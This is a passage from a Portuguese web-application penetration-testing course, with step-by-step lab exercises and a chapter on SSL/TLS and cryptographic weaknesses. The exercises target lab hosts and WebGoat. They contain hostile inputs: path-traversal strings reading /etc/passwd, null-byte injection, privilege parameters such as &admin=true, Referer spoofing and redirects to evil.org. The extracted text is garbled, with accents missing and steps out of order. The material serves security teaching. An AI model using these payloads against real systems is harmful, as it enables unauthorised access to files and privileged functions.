2 Utilize funes que sejam binariamente seguras, isto , que no atribuam semnTeste de Invaso de Aplicaes Web
tica especial para alguns caracteres, como o nulo, por exemplo.
390
1 Sempre que possvel, utilize links diretos para os diversos recursos, em vez de uma
pgina de redirecionamento.
1 Quando o redirecionamento for necessrio:

2 Verifique se a URL do recurso de destino pertence a uma lista de valores permitidos.
2 No defina a URL do recurso de destino com base em dados que sejam controlados por usurios.
chroot
Consiste em uma
funcionalidade provida
por alguns sistemas
operacionais, que
permite fazer com que
um subdiretrio seja
visto, por um processo e
seus filhos, como sendo
a raiz do sistema de
arquivos.
2 Se em algum caso muito especial for necessrio usar dados fornecidos por usu-
rios, para definio da URL do recurso de destino, adicione no incio dela o protocolo e o nome de domnio esperados, com uma barra (/) no final. Alm disso,
aplique a tcnica de lista branca, para validar o parmetro a ser concatenado.
1 Use mecanismos de sincronizao quando manipular dados compartilhados, como

arquivos ou registros de bancos de dados, por exemplo.
1 Utilize casos de abuso para identificar vulnerabilidades na lgica de negcio da aplicao.
391
392
Atividade 1 Acesso direto a recursos
Esta atividade tem por objetivo ilustrar as diversas tcnicas que podem ser usadas para
acesso direto a recursos. Para inici-la, carregue as mquinas virtuais do aluno e do servidor
(Fedora) e execute o roteiro na primeira delas.
Acesso direto a pginas

O objetivo deste exerccio estudar ataques de acesso direto a pginas do sistema, contornando o mecanismo de autorizao.
2. Acesse http://bac.esr.rnp.br/
3. Digite guest e guest nos campos Usurio e Senha, respectivamente, e clique em Login.
4. Anote a URL do link para a caixa de mensagens e, em seguida, clique nele.
5. Clique em Encerrar sesso.
6. Digite esruser e esruser nos campos Usurio e Senha, respectivamente, e clique em Login.
7. Anote as URLs dos links exibidos.
8. Clique em Caixa de mensagens.
10. Clique em Visualizar arquivos.
12. Clique em Operao no privilegiada.
14. Digite admin e admin nos campos Usurio e Senha, respectivamente, e clique em Login.
15. Anote as URLs dos links exibidos.
22. Clique em Funo Administrativa #2.
24. Clique em Operao no privilegiada.
393
http://bssac.esr.rnp.br/oper2.php
27. O acesso foi permitido? Clique em Retornar pgina de login.
29. O acesso foi permitido? Clique em Retornar pgina de login.
32. O que acontece?
35. O que acontece?
Uso do cabealho HTTP Referer

Neste exerccio, ficar claro por que o uso do cabealho HTTP Referer no serve para controlar o acesso a pginas da aplicao.
37. Acesse http://bssac.esr.rnp.br/admin/
41. Acesse o menu Tools e selecione Tamper Data.
42. Retorne ao Firefox e clique em Caixa de mensagens.
394
43. Acesse a janela do Tamper Data e clique na primeira requisio.

44. Observe o valor do cabealho Referer, na parte inferior do lado esquerdo da janela.
45. Retorne ao Firefox e pressione Alt + [Seta para esquerda], para voltar pgina anterior.
47. Volte janela do Tamper Data e clique na requisio cuja URL contm oper2.php.
48. Anote o valor do cabealho Referer.
49. Retorne ao Firefox e clique em Encerrar sesso.
http://bssac.esr.rnp.br/admin/oper2.php
51. O que acontece?

http://bssac.esr.rnp.br/
http://bssac.esr.rnp.br/admin/oper2.php
56. Foi possvel acessar a pgina?
57. Na janela do Tamper Data, clique em Start Tamper.

58. No Firefox, clique no cone para recarregar a pgina.
59. Clique em Tamper, na janela que aparece.
60. Clique com o boto direito na parte esquerda da janela e, em seguida, em Add element.
61. Digite Referer e clique em Ok.
62. Substitua o valor de Referer para http://bssac.esr.rnp.br/admin/menu.php e clique em Ok.
63. Foi possvel acessar a funcionalidade?

65. Na janela que aparece, desmarque Continue Tampering? e clique em Submit.
66. Feche a janela do Tamper Data.
Acesso direto a objetos

O foco deste exerccio ilustrar como objetos de outros usurios podem ser acessados quando
se tem permisso de uso da funcionalidade e o mecanismo de autorizao vulnervel.
68. Acesse http://bssac.esr.rnp.br/

70. Clique no link Caixa de mensagens.
71. Clique na mensagem M#1 para visualiz-la.
72. Observe a barra de endereos do navegador web.
74. Fornea esruser e esruser para os campos Usurio e Senha, respectivamente, e clique
67. Retorne ao Firefox.
em Login.
395

82. Digite a seguinte URL na barra de endereos do navegador e clique na seta verde:
83. O que acontece?
84. Clique em Retornar pgina de login. Digite guest e guest nos campos Usurio e Senha,
respectivamente, e clique em Login.

86. Foi possvel ver a mensagem de outro usurio?
87. Repita o Passo 86, variando o valor do parmetro mid de 2 a 8.
Acesso direto a recursos estticos

Nesta parte da atividade, so vistos ataques de acesso direto a recursos estticos.
91. Anote as URLs dos links apresentados.
92. Clique em echo.txt.
http://bssac.esr.rnp.br/files/cat.txt
96. Foi possvel acessar o arquivo, mesmo no estando autenticado? Explique por que isso
possvel.
97. Tente acessar as demais URLs anotadas no Passo 91.

396
Atividade 2 Controle de acesso no lado cliente da aplicao

Confiar em controles que so executados no lado cliente da aplicao uma prtica ruim de
segurana, pois podem ser facilmente violados por usurios maliciosos. O propsito desta
atividade ilustrar alguns cenrios em que essa vulnerabilidade est presente e os testes
que podem ser efetuados para identific-la. Os exerccios devem ser realizados na mquina
virtual do aluno e recomenda-se que se imagine o meio de resolv-los antes de seguir o
roteiro fornecido.
Autorizao no lado cliente da aplicao

Esta parte do exerccio aborda uma aplicao que realiza o processo de autorizao com
cdigo Javascript, a partir de uma matriz de controle de acesso obtida no servidor.
2. Acesse http://bcsac.esr.rnp.br/js/
4. Passe o mouse sobre os links e veja a URL de cada um deles.
5. Clique em Caixa de mensagens e veja a URL na barra de endereos.
7. Clique em Funo Administrativa #1. O que acontece?
8. Clique em Ok.
9. Clique em Visualizar arquivos. O que acontece?
10. Clique em Ok.

12. Analise o cdigo Javascript e os formatos dos links.
13. Feche a janela de cdigo HTML.
14. No Firefox, clique em Encerrar sesso.
17. Clique em Funo Administrativa #1 e veja a URL na barra de endereos.

19. Clique em Visualizar arquivos e veja a URL na barra de endereos.
22. Analise o cdigo Javascript e os formatos dos links. O que difere do visto no Passo 12?
16. Passe o mouse sobre os links e veja a URL de cada um deles.
397
23. Feche a janela de cdigo HTML.

24. No Firefox, clique em Encerrar sesso.
http://bcsac.esr.rnp.br/js/oper2.php
26. O que acontece?

http://bcsac.esr.rnp.br/js/oper2.php
30. O acesso foi concedido? Onde se encontra a falha?
Manuteno de perfil no lado cliente da aplicao

O objetivo deste exerccio consiste em violar aplicaes que mantm o perfil de acesso do
usurio, no lado cliente da aplicao.
32. Acesse http://bcsac.esr.rnp.br/
33. Digite esruser e esruser nos campos Usurio e Senha, respectivamente, e clique em Login.
34. Passe o mouse sobre os links e veja a URL de cada um deles. O que chama a ateno?

36. Passe o mouse sobre os links e veja a URL de cada um deles. Existe uma diferena funda-
mental entre essas URLs e as do Passo 34, do ponto de vista de um ataque. Qual ?
37. Altere a URL na barra de endereos do navegador, adicionando as entradas abaixo, uma
por vez, e clicando na seta verde a cada iterao:
&adm=Y
&adm=S
&adm=true
&admin=Y
&admin=S
&admin=true
&root=Y
&root=S
&root=true
398
38. Foi possvel obter acesso mais privilegiado?
39. Altere a barra de endereos para a URL abaixo e clique na seta verde:
http://bcsac.esr.rnp.br/oper1.php?uid=admin
40. O que aconteceu?
41. Clique em M#1 de admin. Foi possvel ler a mensagem?
42. Acesse o WebGoat clicando no cone na barra de atalhos.

43. Fornea guest e guest como credenciais e clique em Ok.
45. Clique em Admin Functions e observe as funes disponveis.
46. Clique em Access Control Flaws e, em seguida, em Remote Admin Access.
47. Repita o Passo 37, mas, adicionalmente, clique em Admin Functions, a cada interao, para
ver se o ataque foi bem-sucedido.

48. Com que parmetro a interface administrativa liberada?
Proteo de referncias a objetos

Neste exerccio, sero estudadas abordagens inseguras utilizadas na proteo de referncias a objetos internos da aplicao.
2. Acesse http://refp.esr.rnp.br/
3. Clique no link para a RFC 2616.
4. Observe a URL na barra de endereos e os valores dos parmetros f e t.
de proteo utilizado?

10. Observe a URL na barra de endereos e os valores dos parmetros f e t. Que esquema
de proteo utilizado?
7. Observe a URL na barra de endereos e os valores dos parmetros f e t. Que esquema
399
13. Observe a URL na barra de endereos e os valores dos parmetros f e t.
Que esquema de proteo utilizado?
15. Suponha a existncia do arquivo ylonen.2006.txt. Como seria a URL para acess-lo,
quando o parmetro t = 0? Tente visualizar o arquivo, no Firefox.

17. Repita o passo 15, para t = 1. Empregue o utilitrio rev, se necessrio.
19. Repita o passo 15 para t = 2. Empregue o utilitrio base64, se necessrio, e cuidado com
caracteres de final de linha.

21. Repita o passo 15 para t = 3.
Atividade 3 Percurso de caminho

Aplicaes que manipulam arquivos selecionados pelo usurio podem ser vulnerveis a
ataques de percurso de caminho, que o tema da presente atividade. Os roteiros devem
ser executados na mquina virtual do aluno e recomenda-se que a estratgia de explorao
seja traada antes de se ver a soluo.
2. Acesse http://path.esr.rnp.br/
3. Passe o mouse sobre os links e observe atentamente as URLs, na barra de estado.
O que chama a ateno para um possvel ataque?

4. Clique no link para a RFC 2616 e observe a barra de endereos do navegador web.
5. Altere, na barra de endereos, o valor do parmetro f para o seguinte:
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6. O ataque de percurso de caminho funciona?
400
7. Repita o Passo 5, mas usando o valor a seguir:
fielding.1999.txt%00abcdef
8. O arquivo original foi exibido normalmente? Justifique o resultado.
9. Repita o Passo 5, mas usando o valor abaixo, para ver o cdigo fonte de view.php:
..%2Fview.php
10. Acesse http://path.esr.rnp.br/index2.php

11. Passe o mouse sobre os links e observe atentamente as URLs na barra de estado.
O que mudou em relao ao cenrio anterior?
12. Clique no link para a RFC 2616 e observe a barra de endereos do navegador web.
13. Altere, na barra de endereos, o valor do parmetro f para o seguinte:
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
14. O ataque funcionou? Qual seria o motivo do resultado obtido?
15. Repita o Passo 13, mas adicionando um caractere nulo codificado (%00) ao final do valor.
16. O que aconteceu agora? Justifique o resultado.
Atividade 4 Redirecionamento no validado

Esta atividade apresenta o problema de redirecionamento no validado, o qual favorece
ataques de phishing. Execute o roteiro na mquina virtual de aluno e procure descobrir os
passos, antes de ler os fornecidos.
4. Acesse http://redir.esr.rnp.br/
5. Clique em Redirecionamento HTTP temporrio.
6. No WebScarab, verifique as requisies realizadas e as respostas fornecidas.
8. Clique em Redirecionamento HTTP permanente.

14. Clique em Redirecionamento por meio de Javascript.
17. Clique em Redirecionamento por meio de .htaccess.
11. Clique em Redirecionamento por meio de meta-tag Refresh.
401
20. Clique em Redirecionamento no validado #1.
Que parmetro foi passado e com que valor?
23. Clique com o boto direito sobre Redirecionamento no validado #1 e selecione Copy Link
Location.
24. Selecione a barra de endereos e cole a URL, pressionando Ctrl + V.
25. Altere o valor do parmetro url para http://www.evil.org e clique na seta verde.
26. A aplicao vulnervel a redirecionamento no validado?
Location.
33. Altere o valor do parmetro target para .evil.org e clique na seta verde.
34. A aplicao vulnervel a redirecionamento no validado?
402
Location.
41. Observe atentamente a URL e as partes que a compem.
42. Altere o valor do parmetro url para http://www.evil.org e clique na seta verde.
43. O ataque funcionou? Procure explicar o resultado.
44. Altere o valor do parmetro url para http://www.evil.org/?u=http://redir.esr.rnp.br/ e
clique na seta verde.

45. E agora? O ataque funcionou?

49. Inicie o Google Chrome, presente no menu Aplicativos\Internet.
50. Acesse http://redir.esr.rnp.br/
51. Clique em Redirecionamento por meio de meta-tag Refresh e espere ser redirecionado.
52. Clique no boto Retornar. O que acontece?
Atividade 5 Condies de corrida

O objetivo desta atividade ilustrar o que pode ocorrer quando uma condio de corrida
explorada, e a dificuldade de se executar ataques desse tipo. O roteiro abaixo deve ser
seguido na mquina virtual do aluno, aps traada a estratgia de explorao.
2. Acesse o WebGoat, a partir da barra de atalhos.
3. Autentique-se com as credenciais guest e guest.
5. No menu presente no lado esquerdo, clique em Concurrency e, em seguida, em Thread
Safety Problems.
6. Leia a descrio do exerccio fornecida.
7. Digite jeff em Enter user name.
8. Inicie o Google Chrome, presente no menu Aplicativos\Internet.
9. Acesse o WebGoat, digitando http://webgoat.esr.rnp.br:8080/webgoat/attack na barra
de endereos.

12. No menu presente no lado esquerdo, clique em Concurrency e, em seguida, em Thread
Safety Problems.
13. Digite dave em Enter user name.
14. Retorne ao Firefox e clique em Submit.
15. Retorne rapidamente ao Google Chrome e clique em Submit.
10. Autentique-se com as credenciais guest e guest.
403
16. Compare as informaes exibidas nos dois navegadores e veja se so do mesmo usurio.
Em caso positivo, o ataque foi efetuado com sucesso. Se no, repita o processo at conseguir.
Atividade 6 Vulnerabilidades na lgica de negcio

Nesta atividade, dois cenrios de lgica de negcio vulnervel sero estudados e explorados. Execute o roteiro na mquina virtual do aluno e procure quebrar as aplicaes, por
iniciativa prpria, antes de acompanhar os passos disponibilizados.
2. Acesse http://blogic.esr.rnp.br/. Digite 100 no campo Valor da transferncia e clique
em Transferir.
3. Repita o passo 3, mas digitando 2000 no campo Valor da transferncia.
4. Digite -400 no campo Valor da transferncia e clique em Transferir. O que acontece?
5. Repita o Passo 5. Foi possvel realizar mais essa transferncia?
6. Acesse http://blogic.esr.rnp.br:8080/overflow/Digite 500 no campo Valor do emprstimo
e clique em Emprestar.
7. O que acontece?
8. Repita o Passo 8, mas com o valor 12000 em vez de 500.

9. Foi possvel emprestar o montante especificado?
10. Repita o Passo 8, agora, com o valor 9500.

11. Tente emprestar 30000, para causar um possvel extravasamento de inteiro.
O ataque foi bem-sucedido?
12. Olhe a barra de endereos do navegador e identifique a tecnologia utilizada pela aplicao.
13. Abra uma nova janela do Firefox, e procure na internet os tipos primitivos de Java.
404
14. Anote os maiores valores permitidos para os tipos int e long.

15. Retorne aplicao e tente efetuar um emprstimo com o maior int, anotado no passo
anterior.
16. O ataque foi bem-sucedido?
Bibliografia 8
1 ANDERSON, James P. Computer Security technology planning study. Relatrio Tcnico ESDTR-73-51, Air Force Electronic Systems Division, 1972.
1 BISHOP, Matt. Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux.
Technical Report CSE-95-9, Dept. of Computer Science, University of California at Davis,
Davis, CA 95616-8562, 1995.
1 GROSSMAN, Jeremiah. Seven Business Logic Flaws That Put Your Website At Risk. WhiteHat
Security Whitepaper, 2007.

1 NETZER, Robert H. B. e MILLER, Barton P. What are Race Conditions? - Some Issues and
Formalizations. ACM Letters on Programming Languages and Systems, Volume 1, 1992.
1 PALEARI, Roberto; MARRONE, Davide; BRUSCHI, Danilo e MONGA, Matia. On Race

Vulnerabilities in Web Applications. In: DIMVA 08 Proceedings of the 5th international
conference on Detection of Intrusions and Malware, and Vulnerability Assessment,
Lecture Notes in Computer Science, Volume 5137, Springer-Verlag, 2008.
405
406
9
Apresentar tcnicas para identificar problemas de segurana na configurao de
canais de comunicao e no uso de mecanismos criptogrficos.
conceitos
Canal de comunicao com segurana mal configurada, sutes criptogrficas, protocolos

proprietrios, BASE64, criptoanlise de cifras clssicas, ndice de coincidncia, chaves
embutidas, chaves com baixa entropia, modo de operao inadequado, nvel de
segurana de criptossistemas, proteo de senhas.
Introduo
A criptografia moderna est presente no nosso cotidiano de maneira profusa, em
protocolos de comunicao, caixas eletrnicos, telefonia celular, proteo de software

e de contedo, urnas eletrnicas e TV digital, dentre inmeros outros exemplos. Em sistemas de informao, quando todos os demais mecanismos so quebrados e os dados,
extrados da base de dados, a proteo criptogrfica compreende a ltima barreira para
evitar que o sigilo das informaes sensveis seja violado. Considerando o estado da arte
dessa cincia, possvel, atualmente, realizar um timo trabalho nesse sentido, evitando
que os dados caiam em mos indesejadas.
Infelizmente, porm, a implantao de mecanismos criptogrficos requer diversos
cuidados, que, na grande maioria das vezes, no so observados, comprometendo a
segurana da soluo como um todo.
No mnimo, os seguintes aspectos devem ser considerados:
1 Utilizao de algoritmos e protocolos conhecidos e extensivamente analisados.

1 Uso de primitivas criptogrficas adequadas para cada situao.
1 Emprego de bibliotecas que contenham implementaes corretas dos criptossistemas
adotados.
1 Gerenciamento das chaves criptogrficas, sobretudo os processos de gerao, distribuio e armazenamento.

O resultado obtido por uma equipe liderada por Marc Stevens (Stevens, 2009) um bom
exemplo de como as coisas podem dar muito errado, quando as melhores prticas no so
seguidas. Neste trabalho, que recebeu o prmio de melhor artigo da conferncia Crypto
Captulo 9 - Mecanismos criptogrficos
objetivos
Mecanismos criptogrficos
2009, os autores descreveram um mtodo para criar um certificado digital vlido, porm
407
falsificado, de uma autoridade certificadora intermediria. O ataque baseou-se nas vulnerabilidades encontradas na funo MD5 (Wang e Yu, 2005) e no fato de que, na ocasio, algumas
autoridades certificadoras ainda assinavam os certificados com o algoritmo RSA + MD5, alm
de possurem processos descuidados de comprovao de identidade do solicitante. Adicionalmente, foi necessria muita engenhosidade para que as pr-condies fossem satisfeitas, e
uma boa dose de poder computacional, fornecida por uma grade de 200 Sony PlayStation 3.
A gravidade do exemplo acima que o ataque tornou possvel forjar certificados digitais,
reconhecidos por navegadores e clientes web, para qualquer pessoa ou entidade. No
contexto de aplicaes web, esta possibilidade, quando agregada a um ataque de redirecionamento, permite realizar uma personificao perfeita de um servidor, isto , conexes
SSL ou TLS sem advertncia de problema no certificado utilizado. A origem do problema foi
o uso por algumas autoridades certificadoras de um algoritmo quebrado, no caso o MD5,
contrariando o clamor da comunidade criptolgica. A soluo, por sua vez, depende da revogao dos certificados razes das autoridades problemticas, o que realizado por meio da
atualizao dos navegadores web. Mas qual a porcentagem de usurios que regularmente
atualizam os softwares que utilizam? A resposta desta pergunta deveras preocupante!
Considerando os problemas expostos, o objetivo do presente captulo discutir as inmeras
vulnerabilidades que podem ocorrer no transporte e armazenamento de informaes. Com
isso em mente, os tpicos cobertos so: verso vulnervel de SSL, emprego de sutes criptogrficas fracas, problemas com o certificado digital, acesso a domnio no verificado, uso de
protocolos proprietrios, identificao e quebra de cifras clssicas, recuperao de chaves
embutidas no cdigo, gerao de chaves com baixa entropia, utilizao de modo de operao inadequado, uso incorreto de algoritmos criptogrficos, mistura de algoritmos com
nveis de segurana diferentes, uso de algoritmos criptogrficos com fraquezas conhecidas,
proteo de senhas de usurio e proteo de dados de cartes de pagamento.
Acesso aplicao web
Voc j acessou alguma aplicao web para a qual o navegador web tenha apresentado erro
relacionado ao certificado digital?
Vulnerabilidades no transporte de informaes

Comunicao segura de rede ocorre quando os seguintes requisitos de segurana da
informao so satisfeitos (Howard et al., 2005; Stallings, 2005):
408
1 Autenticao de entidades as identidades das partes envolvidas na comunicao

so corroboradas. Isto importante para certificar-se de que a conversao ocorre
com a entidade correta, ainda mais que ataques de redirecionamento so relativamente comuns.
1 Autenticao da origem da mensagem corroborao de identidade do remetente

da mensagem, para evitar falsificao de dados.
1 Integridade informaes enviadas no so adulteradas em trnsito. Afinal, ningum quer

que a conta destino de uma transferncia bancria seja alterada para a de um atacante.
1 Confidencialidade informaes transportadas pelo canal no so reveladas a
terceiros que no sejam parte da comunicao. Por exemplo, senhas e nmeros de

carto de crdito devem ser conhecidos apenas pelas partes autorizadas.
Em aplicaes web, esses requisitos so atendidos, normalmente, pelo uso dos protocolos SSL e TLS, para transporte de dados HTTP, os quais realizam um timo trabalho,
quando implantados corretamente. Infelizmente, na prtica, servidores no so corretamente configurados, do ponto de vista de segurana, e clientes de acesso personalizados no implementam algumas sutilezas desses protocolos adequadamente.
O resultado disso que a violao dos requisitos supracitados torna-se completamente
factvel e, para piorar ainda mais a situao, ainda h os que acreditam que o uso de HTTPS,
por si s, suficiente para tornar uma aplicao web segura!
Saiba mais
Do lado do servidor, um problema muito comum ocorre com o certificado digital utilizado
na configurao do tnel SSL/TLS. Inmeros so os casos de aplicaes que empregam
certificados autoassinados, expirados ou emitidos por autoridades certificadoras caseiras,
Phishing uma tcnica

baseada em engenharia social, na qual um
usurio malicioso se
passa por uma entidade confivel, para
obter informaes
confidenciais, como
nmeros de carto de
crdito e credenciais
de acesso a sistemas.
Um exemplo so as
mensagens de correio
eletrnico, supostamente enviadas pelo
banco, que solicitam
o fornecimento de senhas alegando, como
motivo, problemas
no sistema.
das quais os navegadores e sistemas clientes no possuem a chave pblica autntica, para
validao de assinatura. Em qualquer um desses casos, uma mensagem de erro, como a
ilustrada pela Figura 9.1, exibida ao usurio. Como o objetivo deste sempre utilizar o
sistema, provavelmente, ele ignorar o alerta e continuar o acesso, ainda mais impulsionado pelo hbito criado pela aplicao. Posteriormente, se ele for vtima de um ataque de
phishing ou de redirecionamento, a tela de aviso aparecer igualmente e a pessoa prosseguir como acostumada.
Outro problema resultante de m configurao o suporte a sutes criptogrficas fracas
e a verses antigas do protocolo SSL.

Existem sutes para testes, habilitadas por padro em sistemas antigos, as quais no utilizam
cifras para proteger a confidencialidade das informaes trafegadas. Outras, por sua vez,
cifram o canal, mas com algoritmos datados ou de exportao, que podem ser quebrados
por fora bruta. J no caso de SSL 2.0, possvel forar a escolha de algoritmos, por meio da
adulterao do handshake, e, tambm, excluir bytes ao final de cada mensagem, sem ser
detectado, devido a uma falha na gerao do MAC (Wagner e Schneier, 1996). Alm dessas vulnerabilidades, esta verso baseia o encerramento de sesso no envio de um pacote TCP com
Flag FIN
o flag FIN habilitado. Qualquer pessoa, porm, pode forjar um pacote assim e, portanto, no
Bit presente
no cabealho TCP,
utilizado para
encerramento
de conexes.
h como as entidades envolvidas na comunicao saberem se a transmisso foi encerrada de
maneira legtima.
409
Um ponto que nunca recebe a ateno que merece a proteo da chave privada utili-
zada por esses protocolos.

Em ambientes tpicos, ela protegida por uma senha, a qual embutida em scripts de
inicializao do servidor, para que seja carregada automaticamente. Normalmente, no h
restries quanto leitura desses arquivos, o que permite que qualquer usurio acesse a
chave privada, aps inspeo da senha utilizada. Embora essa abordagem seja melhor em
termos operacionais, pssima para a segurana. Uma vez conseguidos a chave privada e
certificado de uma aplicao web, fica muito fcil personific-la de maneira perfeita, pois
nenhum navegador ir reclamar de no ter conseguido completar o handshake SSL/TLS.
O ltimo exemplo de vulnerabilidade no lado do servidor compreende aplicaes
que protegem o transporte de informaes sigilosas, por meio do protocolo HTTPS,

configurando-o perfeitamente, com sutes criptogrficas fortes e certificado digital
vlido. No obstante, permitem que o mesmo recurso seja acessado, tambm, por meio
de HTTP simples.
Assim, sem muita dificuldade, um usurio pode ser induzido a acessar pginas sensveis,
por meio desse protocolo, quando, ento, informaes em claro podero ser capturadas
em trnsito.
Do lado cliente, os problemas surgem quando as informaes do certificado digital apresentado pelo servidor no so validadas, ou quando o protocolo no seguido risca.
Logo, se a data do acesso estiver fora do prazo de validade do certificado, se ele estiver
revogado ou se no for possvel verificar as assinaturas digitais na cadeia de certificao,
o handshake deve ser finalizado com erro. Outro aspecto importante considerado na
especificao do HTTPS, mas no pelos protocolos SSL/TLS, que o nome do domnio sendo
410
Figura 9.1
Erro na validao
do certificado.
acessado deve ser conferido com o contido no certificado (Howard et al., 2005; Oaks, 2001).
Se isto no for satisfeito, possvel violar o requisito de autenticao de entidades.
Por fim, observe-se a Figura 9.1 novamente. O navegador, frente a um problema na negociao do protocolo SSL, d a opo ao usurio, potencialmente leigo em segurana, de
adicionar uma exceo e continuar o acesso ao stio web. Entregar uma deciso de segurana a um usurio , conforme Howard et al. (2005), uma vulnerabilidade, pois no se pode
esperar que ele sempre escolha a opo mais segura. Consonantemente, o autor considera
que isso seja um defeito de projeto dos navegadores, que deveriam considerar uma falha
no estabelecimento do tnel SSL, como um problema de conectividade de rede, no qual o
usurio impedido de prosseguir.
Verso vulnervel de SSL

A verso 2.0 do protocolo SSL apresenta diversas vulnerabilidades e, assim, no deve ser
utilizada em ambientes de produo.

Apesar disso, comum encontrar stios web que a aceitam, para que navegadores e clientes
web antigos no sejam impedidos de acessar a aplicao. Esta prtica um timo exemplo
de aceitao de risco para suportar uma base de softwares legados, mas que no vai ao
encontro das melhores prticas de segurana.
A maneira mais simples de testar se um servidor est configurado para aceitar SSLv2
por meio da opo -ssl2 do utilitrio OpenSSL.

Em caso positivo, a sada do comando ser similar abaixo apresentada:
~$ openssl s_client -ssl2 -connect exemplo.esr.rnp.br:443

...
SSL handshake has read 1416 bytes and written 364 bytes
--New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
SSL-Session:
Protocol
: SSLv2
Cipher
: DES-CBC3-MD5
Session-ID: 19E91A78897D209ACAC7E8ED05AA9C04
Session-ID-ctx:
Master-Key: 1522EE3B83E13B7C4CB1E04792BB1E7488209B4D7D0992FF
Key-Arg
Expansion: NONE
: AC6828F1ED84E617
411
Start Time: 1295810056

Timeout
: 300 (sec)
Verify return code: 21 (unable to verify the first certificate)

---
...
Suporte a sutes criptogrficas fracas

Uma sute criptogrfica, no contexto dos protocolos SSL e TLS, descreve um conjunto
de algoritmos que devem ser empregados na proteo do canal de comunicao.

Algumas delas, entretanto, utilizam criptossistemas fracos, que fornecem pouca ou
nenhuma segurana.
Dentre os exemplos extremos deste caso esto as sutes NULL-MD5 e NULL-SHA, que
no cifram os dados trafegados e permitem, portanto, que as informaes, em claro, sejam
capturadas em trnsito. O seguinte cenrio ilustra um ataque bem-sucedido contra esta
vulnerabilidade:
1. Por meio de outra vulnerabilidade no cliente, o atacante fora que a lista de sutes
enviadas na mensagem client_hello contenha apenas a NULL-SHA.

2. O servidor escolhe os algoritmos para proteo do tnel SSL, com base na inter-
seco das listas de sutes suportadas por ambos que, no caso, a prpria NULL-SHA.
3. O atacante captura os pacotes de rede e extrai as informaes desejadas que, embora
encapsuladas por SSL, no esto cifradas, conforme possvel observar pela Figura 9.2.
412
Figura 9.2
Trfego TLS
em claro.
Existem diversas ferramentas que podem ser utilizadas para identificar as sutes cripto-
grficas suportadas por um servidor web. A primeira delas o prprio OpenSSL, com a
opo -cipher, que define a sute a ser utilizada na conexo.
Se ela no for suportada pelo servidor, uma mensagem de erro exibida, informando que
a negociao SSL/TLS no foi bem-sucedida. O exemplo abaixo testa se os servidores do
GMail suportam a sute NULL-SHA.
~$ openssl s_client -connect gmail.google.com:443 -cipher NULL-SHA

CONNECTED(00000003)
8820:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert
handshake failure:s23_clnt.c:596:
Observe-se que o comando acima testa apenas uma nica sute criptogrfica e, assim, ele
deve ser repetido individualmente para cada par (sute, verso de protocolo). Embora isso seja
uma desvantagem do OpenSSL, relativamente fcil implementar um script baseado neste
utilitrio que identifique todas as sutes suportadas por um servidor. Basta para esse propsito verificar se cada execuo do comando resulta em erro ou em uma conexo efetuada.
A primeira opo ao OpenSSL o utilitrio THCSSLCheck, criado por Johnny Cyberpunk e
disponibilizado nativamente apenas para plataformas Windows.

Apesar disso, pode ser facilmente portado para outras plataformas, por meio do software
de emulao Wine. Apresenta a grande vantagem de testar diversas sutes com uma nica
execuo; porm, no testa o suporte a cifras nulas e no atualizado desde 2004, quando
foi lanado para o pblico. Este ltimo problema, no entanto, no to expressivo, uma vez
que raramente so adicionadas novas sutes ao protocolo. Para exemplificar o uso do
THCSSLCheck, o relatrio parcial da execuo contra o GMail est ilustrado a seguir.
C:\ >thcsslcheck gmail.google.com 443

-----------------------------------------------------------------------THCSSLCheck v0.1 - coding johnny cyberpunk (www.thc.org) 2004
------------------------------------------------------------------------
[*] testing if port is up. pleaze wait...

[*] port is up !
[*] service speaks SSL !
[*] now testing SSLv2

---------------------------------------------------------------------DES-CBC3-MD5 - 168 Bits - unsupported
IDEA-CBC-MD5 - 128 Bits - unsupported
[*] testing if service speaks SSL ...
RC2-CBC-MD5 - 128 Bits - unsupported
413
RC4-MD5 - 128 Bits unsupported

...
[*] now testing SSLv3

---------------------------------------------------------------------DHE-RSA-AES256-SHA - 256 Bits - unsupported
DHE-DSS-AES256-SHA - 256 Bits - unsupported
AES256-SHA - 256 Bits -
supported
EDH-RSA-DES-CBC3-SHA - 168 Bits - unsupported

EDH-DSS-DES-CBC3-SHA - 168 Bits - unsupported
DES-CBC3-SHA - 168 Bits -
supported
...
EXP-EDH-DSS-DES-CBC-SHA -
40 Bits - unsupported
EXP-DES-CBC-SHA -
EXP-RC2-CBC-MD5 -
EXP-RC4-MD5 -
[*] now testing TLSv1

---------------------------------------------------------------------DHE-RSA-AES256-SHA - 256 Bits - unsupported
DHE-DSS-AES256-SHA - 256 Bits - unsupported
AES256-SHA - 256 Bits -
supported
EDH-RSA-DES-CBC3-SHA - 168 Bits - unsupported

EDH-DSS-DES-CBC3-SHA - 168 Bits - unsupported
...
EXP-DES-CBC-SHA -
EXP-RC2-CBC-MD5 -
EXP-RC4-MD5 -
A ltima ferramenta que ser abordada nesta seo a SSL Scan, desenvolvida e distribuda pela empresa Titania, sob uma licena GPLv3.
Para gerar o binrio, necessrio utilizar o compilador GNU C e ter o OpenSSL instalado
no ambiente. Alm de testar diversas sutes a partir de uma nica execuo, o SSL Scan
tambm exibe informaes sobre o certificado e lista quais so os mecanismos escolhidos
414
GNU
Acrnimo recursivo
para GNUs Not Unix.
O projeto GNU
iniciou-se em 1983 com
o objetivo de criar um
sistema operacional
completo, similar ao
Unix, baseado somente
em softwares livres.
por padro, para os protocolos SSLv2, SSLv3 e TLSv1, quando disponveis. Observe-se,
abaixo, o relatrio parcial da execuo do utilitrio contra o GMail.
~$ sslscan gmail.google.com
_
_ _ _ _ _ _| |_ _ _
___ __ _ _ __
/ _ _/ _ _| / _ _|/ _ _/ _
| _ \
\_ _ \_ _ \ \_ _ \ (_| (_| | | | |
|_ _ _/_ _ _/_|_ _ _/\_ _ _\_ _,_|_| |_|
Version 1.8.2
http://www.titania.co.uk
Copyright Ian Ventura-Whiting 2009
Testing SSL server gmail.google.com on port 443
Supported Server Cipher(s):

Rejected
SSLv2
168 bits
DES-CBC3-MD5
Rejected
SSLv2
56 bits
DES-CBC-MD5
Rejected
SSLv2
40 bits
EXP-RC2-CBC-MD5
Rejected
SSLv3
256 bits
ADH-AES256-SHA
Rejected
SSLv3
256 bits
DHE-RSA-AES256-SHA
Rejected
SSLv3
256 bits
DHE-DSS-AES256-SHA
Accepted
SSLv3
256 bits
AES256-SHA
Rejected
